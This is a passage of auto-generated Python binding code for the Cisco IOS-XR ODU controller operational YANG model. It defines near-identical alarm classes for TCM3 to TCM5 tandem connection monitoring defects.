self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm3Lck, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm3Lck']['meta_info']
class Tcm3Iae(_Entity_):
"""
TCM3 Incoming Alignment Error
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm3Iae, self).__init__()
self.yang_name = "tcm3-iae"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm3-iae"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm3Iae, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm3Iae']['meta_info']
class Tcm3Biae(_Entity_):
"""
TCM3 Backward Incoming Alignment Error
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm3Biae, self).__init__()
self.yang_name = "tcm3-biae"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm3-biae"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm3Biae, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm3Biae']['meta_info']
class Tcm3Bdi(_Entity_):
"""
TCM3 Backward Defect Monitoring
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm3Bdi, self).__init__()
self.yang_name = "tcm3-bdi"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm3-bdi"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm3Bdi, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm3Bdi']['meta_info']
class Tcm3Tim(_Entity_):
"""
TCM3 Trail Trace Identifier Mismatch
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm3Tim, self).__init__()
self.yang_name = "tcm3-tim"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm3-tim"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm3Tim, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm3Tim']['meta_info']
class Tcm3SfBer(_Entity_):
"""
TCM3 SF BER alarm
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm3SfBer, self).__init__()
self.yang_name = "tcm3-sf-ber"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm3-sf-ber"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm3SfBer, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm3SfBer']['meta_info']
class Tcm3SdBer(_Entity_):
"""
TCM3 SD BER alarm
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm3SdBer, self).__init__()
self.yang_name = "tcm3-sd-ber"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm3-sd-ber"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm3SdBer, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm3SdBer']['meta_info']
class Tcm4Ais(_Entity_):
"""
TCM4 Alarm Indication Signal
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm4Ais, self).__init__()
self.yang_name = "tcm4-ais"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm4-ais"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm4Ais, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm4Ais']['meta_info']
class Tcm4Ltc(_Entity_):
"""
TCM4 Loss of Tandem connection Monitoring
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm4Ltc, self).__init__()
self.yang_name = "tcm4-ltc"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm4-ltc"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm4Ltc, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm4Ltc']['meta_info']
class Tcm4Oci(_Entity_):
"""
TCM4 Open Connection Indiction
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm4Oci, self).__init__()
self.yang_name = "tcm4-oci"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm4-oci"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm4Oci, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm4Oci']['meta_info']
class Tcm4Lck(_Entity_):
"""
TCM4 Upstream Connection Locked
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm4Lck, self).__init__()
self.yang_name = "tcm4-lck"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm4-lck"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm4Lck, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm4Lck']['meta_info']
class Tcm4Iae(_Entity_):
"""
TCM4 Incoming Alignment Error
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm4Iae, self).__init__()
self.yang_name = "tcm4-iae"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm4-iae"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm4Iae, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm4Iae']['meta_info']
class Tcm4Biae(_Entity_):
"""
TCM4 Backward Incoming Alignment Error
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm4Biae, self).__init__()
self.yang_name = "tcm4-biae"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm4-biae"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm4Biae, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm4Biae']['meta_info']
class Tcm4Bdi(_Entity_):
"""
TCM4 Backward Defect Monitoring
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm4Bdi, self).__init__()
self.yang_name = "tcm4-bdi"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm4-bdi"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm4Bdi, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm4Bdi']['meta_info']
class Tcm4Tim(_Entity_):
"""
TCM4 Trail Trace Identifier Mismatch
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm4Tim, self).__init__()
self.yang_name = "tcm4-tim"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm4-tim"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm4Tim, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm4Tim']['meta_info']
class Tcm4SfBer(_Entity_):
"""
TCM4 SF BER alarm
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm4SfBer, self).__init__()
self.yang_name = "tcm4-sf-ber"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm4-sf-ber"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm4SfBer, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm4SfBer']['meta_info']
class Tcm4SdBer(_Entity_):
"""
TCM4 SD BER alarm
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm4SdBer, self).__init__()
self.yang_name = "tcm4-sd-ber"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm4-sd-ber"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm4SdBer, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm4SdBer']['meta_info']
class Tcm5Ais(_Entity_):
"""
TCM5 Alarm Indication Signal
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm5Ais, self).__init__()
self.yang_name = "tcm5-ais"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm5-ais"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm5Ais, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm5Ais']['meta_info']
class Tcm5Ltc(_Entity_):
"""
TCM5 Loss of Tandem connection Monitoring
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Alarm.Tcm5Ltc, self).__init__()
self.yang_name = "tcm5-ltc"
self.yang_parent_name = "alarm"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('reporting_enabled', (YLeaf(YType.boolean, 'reporting-enabled'), ['bool'])),
('is_detected', (YLeaf(YType.boolean, 'is-detected'), ['bool'])),
('is_asserted', (YLeaf(YType.boolean, 'is-asserted'), ['bool'])),
('counter', (YLeaf(YType.uint64, 'counter'), ['int'])),
])
self.reporting_enabled = None
self.is_detected = None
self.is_asserted = None
self.counter = None
self._segment_path = lambda: "tcm5-ltc"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Alarm.Tcm5Ltc, ['reporting_enabled', 'is_detected', 'is_asserted', 'counter'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Alarm.Tcm5Ltc']['meta_info']
class Tcm5Oci(_Entity_):
"""
TCM5 Open Connection Indiction
.. attribute:: reporting_enabled
Is reporting enabled?
**type**\: bool
**config**\: False
.. attribute:: is_detected
Is defect detected?
**type**\: bool
**config**\: False
.. attribute:: is_asserted
Is defect delared?
**type**\: bool
**config**\: False
.. attribute:: counter
Alarm counter
**type**\: int
